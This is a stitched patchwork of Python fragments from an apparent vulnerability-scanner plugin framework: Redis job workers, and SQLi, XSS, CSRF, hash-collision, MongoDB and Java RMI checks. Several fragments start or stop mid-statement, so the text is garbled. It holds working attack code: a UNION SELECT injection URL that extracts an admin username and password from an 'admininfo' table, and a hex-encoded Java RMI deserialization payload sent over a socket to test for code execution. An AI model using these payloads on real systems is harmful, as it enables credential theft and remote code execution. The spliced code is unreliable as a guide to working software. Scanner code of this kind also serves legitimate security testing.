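def check():
    """Consume scan jobs from the ``data`` list until the process is killed.

    Each iteration pops one entry with ``r.lpop('data')``.  A non-empty entry
    is decoded as JSON, normalised with ``byteify`` and handed, in order, to
    the SQLi, XSS, CSRF and hash-collision scanners through ``main``.  When
    ``lpop`` returns nothing the loop sleeps 10 seconds before polling again.

    ``r``, ``byteify``, ``main`` and the ``*Scan`` classes are module-level
    names of the surrounding file (``r`` is presumably a Redis client --
    confirm against the module header).

    An entry that is not valid JSON is reported and skipped so that a single
    bad item cannot stop the worker; because ``lpop`` has already removed it,
    the entry is not retried.
    """
    while True:
        data = r.lpop('data')
        if not data:
            # Queue empty: back off instead of busy-polling.
            time.sleep(10)
            continue
        print("[ ------------- CHECK DATA ------------- ]")
        try:
            jsonData = json.loads(data)
        except ValueError as exc:
            # json.loads raises ValueError on malformed input (JSONDecodeError
            # is its subclass on Python 3); report it and move to the next job
            # rather than letting the worker loop die.
            print("[ ------------- INVALID DATA: %s ------------- ]" % exc)
            continue
        jsonData = byteify(jsonData)
        print("CHECKING SQLI")
        main(SqliScan(jsonData))
        print("CHECKING XSS")
        main(XssScan(jsonData))
        print("CHECKING CSRF")
        main(CsrfScan(jsonData))
        print("CHECKING HASHCOLLISISON")
        main(HashcollisionScan(jsonData))
        print("[ ------------- WAITING NEXT ------------- ]")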
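def check():
    """Scan every entry currently in the ``data`` list in one pass, then return.

    ``r.lrange('data', 0, -1)`` returns all entries without removing them, so
    each run re-scans whatever is still queued.  Every non-empty entry is
    decoded as JSON, normalised with ``byteify`` and passed to the XSS, CSRF
    and hash-collision scanners via ``main``; the SQLi scanner call is
    commented out in this version and is not run.  An empty entry triggers a
    10-second sleep.

    ``r``, ``byteify``, ``main`` and the ``*Scan`` classes come from the
    surrounding module (``r`` presumably a Redis client -- confirm).

    An entry that is not valid JSON is reported and skipped so that one bad
    item does not abort the whole pass.
    """
    entries = r.lrange('data', 0, -1)
    for data in entries:
        if not data:
            # NOTE(review): with the original whitespace lost it is not certain
            # whether this sleep belonged to the ``if`` or to a ``for``/``else``;
            # kept per-entry, matching the sibling lpop-based worker.
            time.sleep(10)
            continue
        print("[ ------------- CHECK DATA ------------- ]")
        try:
            jsonData = json.loads(data)
        except ValueError as exc:
            # Malformed queue entry: report and continue with the next one.
            print("[ ------------- INVALID DATA: %s ------------- ]" % exc)
            continue
        jsonData = byteify(jsonData)
        # The SQLi scanner (SqliScan) is deliberately not run in this version.
        print("CHECKING XSS")
        main(XssScan(jsonData))
        print("CHECKING CSRF")
        main(CsrfScan(jsonData))
        print("CHECKING HASHCOLLISISON")
        main(HashcollisionScan(jsonData))
        print("[ ------------- WAITING NEXT ------------- ]")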
}, "description": "", "error": "", }) def verify(self): host = self.option.host port = self.option.port try: conn = pymongo.MongoClient(host=host, port=port) db_names = conn.database_names() except Exception, e: self.result.error = "连接发生错误: {error}".format(error=str(e)) return self.result.status = True self.result.data.db_info.db_name = str(db_names) self.result.description = "目标 {host} 的 mongodb 可以未授权访问, 数据库名: {db_names}".format( host=self.option.host, db_names=str(db_names) ) def exploit(self): self.verify() if __name__ == '__main__': from modules.main import main main(TangScan())
"{domain}/php/bill/list_userinfo.php?domain=fatezero.org&ok=1&cp=1 union select concat(0x7e7e7e," "oid,0x7c7c7c,password,0x7e7e7e),2,3,4,5 from admininfo%23".format( domain=self.option.url)) try: response = requests.get(exp_url, cookies=cookies, timeout=15, verify=False) except Exception, e: self.result.error = str(e) return re_result = re_userinfo_pattern.findall(response.content) if len(re_result) == 0: self.result.status = False return self.result.status = True self.result.data.user_info.username = re_result[0][0] self.result.data.user_info.password = re_result[0][1] self.result.description = "目标 {url} 存在sql注入, 目标管理员用户: {username}, 密码: {password}".format( url=self.option.url, username=self.result.data.user_info.username, password=self.result.data.user_info.password) if __name__ == '__main__': from modules.main import main main(TangScan())
javajsondata) - 2.3 * trantime IfExist = False for name in times: if times[name] > limit: print "Probably have HashCollision==>", payload = "TYPE : " + name + " SERVER RUNNING TIME : " + str( times[name]) self.payloads.append(payload) IfExist = True return IfExist except: print "-------------connect error-------------" return False def result(self): """ 攻击类型 :return: """ pass if __name__ == '__main__': from modules.main import main main(HashcollisionScan()) main(HashcollisionScan()) main(HashcollisionScan()) main(HashcollisionScan()) main(HashcollisionScan())
if "Payload" in row: payload = row.split(": ")[1] self.payloads.append(payload) if "Parameter:" in row: prepara = row.split(": ")[1] #prepare如 "#1* (URI)" if "URI" in prepara: # prepare由此截取出一个数字 prepara = prepara.split("#")[1].split("*")[0] para = URI[int(prepara) - 1] + "(GET)" #print chardet.detect(URI[int(prepara)-1]) elif "POST" in prepara: prepara = prepara.split("#")[1].split("*")[0] para = POST[int(prepara) - 1] + "(POST)" self.paras.append(para) return True #file_data="success: [",vul_time,"] url:",url," payload:",payload," cookie:",cookie,"","\n" def result(self): """ 攻击类型 :return: """ pass if __name__ == '__main__': from modules.main import main main(SqliScan())
time.localtime(time.time())) if 'Success' in stdout: self.payloads.append(scanurl) self.paras.append(psbkey) break def changePara(self, para): qs = "" for key in para: val = para[key] if qs: #qs += "&" + urllib.quote(key) + "=" + urllib.quote(val) qs += "&" + key + "=" + val else: #qs += urllib.quote(key) + "=" + urllib.quote(val) qs += key + "=" + val return qs def result(self): """ 攻击类型 :return: """ pass if __name__ == '__main__': from modules.main import main main(XssScan())
except: ##print "无COOKIE ————————————————" cookie = "" #print cookie csrf = csrfCheck() forms = csrf.check(url, cookie) #print forms if len(forms) == 0: return False else: #print url for form in forms: #self.plugin_info["target"] += " -- 表单:" payload = re.findall("<form[\s\S]*?>", form)[0] self.payloads.append(payload) return True #csrf.show(result) def result(self): """ 攻击类型 :return: """ pass if __name__ == '__main__': #print "你好" from modules.main import main main(CsrfScan())
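#coding:utf-8
import redis
import json
from csrf import CsrfScan
from sqli import SqliScan
from modules.main import main
from xss import XssScan
import time

# Module-level Redis client.  Host, port and db are hard-coded to a local
# instance and no password is passed, so this presumably relies on the Redis
# being reachable only from this host -- confirm before deploying elsewhere.
r = redis.Redis(host='127.0.0.1', port=6379, db=0)

# One-shot run: inspect only the most recent entry of the ``data`` list
# (lrange -1 -1 returns the last element and does not remove it).
datas = r.lrange('data', -1, -1)
for data in datas:
    if not data:
        print("NO DATA")
        continue
    try:
        jsonData = json.loads(data)
    except ValueError as exc:
        # Malformed queue entry: report it instead of dying with a traceback.
        print("[ INVALID DATA ] %s" % exc)
        continue
    # The plugin must check that each key it uses is present in the dict it
    # receives, e.g. ``cookie`` may be absent and ``data['cookie']`` would
    # raise KeyError.
    exist = main(XssScan(jsonData))
    if exist:
        # Bug fix: the original line was a bare string expression (a no-op);
        # the message was clearly meant to be printed.
        print("[ 检测出存在漏洞 ]")
    else:
        print("不存在")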
"severity": self.level.high, # 漏洞等级 "privileged": False, # 是否需要登录 "target": self.target #漏洞目标 } def match(self): """ 匹配是否调用此插件 :return: """ return True def check(self): """ 验证类型,尽量不触发waf规则 :return: """ pass def result(self): """ 攻击类型 :return: """ pass if __name__ == '__main__': from modules.main import main main(MeScan())
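#!/usr/bin/env python
# coding:utf-8
# author:ZhaoHu
import os
import sys

# Make the project root (the parent of this file's directory) importable so
# that ``modules`` resolves when the script is run directly from any cwd.
# Appended rather than prepended, so it does not shadow already-installed
# packages.
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))

from modules import main

if __name__ == '__main__':
    main.main()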
"b70016bf00010000002b002b0010000200240000001e0007000000130008001400100015002b0018002c001a0039" \ "001c003b001f00270000000c00026b07002ffc000f070030002b000000040001001000090031003200020023000" \ "000220001000100000006121db8001eb10000000100240000000a00020000002600050027002b00000004000100" \ "100001003300000002003474000577726974657571007e001d000000017671007e002e737200116a6176612e757" \ "4696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c" \ "647078703f4000000000000c7708000000100000000174000576616c756571007e003578787672001b6a6176612" \ "e6c616e672e616e6e6f746174696f6e2e5461726765740000000000000000000000707870" send_data_first = binascii.a2b_hex(send_packet_first) send_data_second = binascii.a2b_hex(send_packet_second) sock.send(send_data_first) recv_packet = sock.recv(1024) ip = recv_packet[3:-4] time.sleep(1) sock.send(send_data_second) packet = sock.recv(1024) packet = sock.recv(1024) if ip in packet: self.result.status = True self.result.data.infos = '存在 Java RMI 反序列化代码执行' except: print "请检查源码" def exploit(self): if self.result.exp_status: print " debug test" if __name__ == '__main__': from modules.main import main main(PLScan())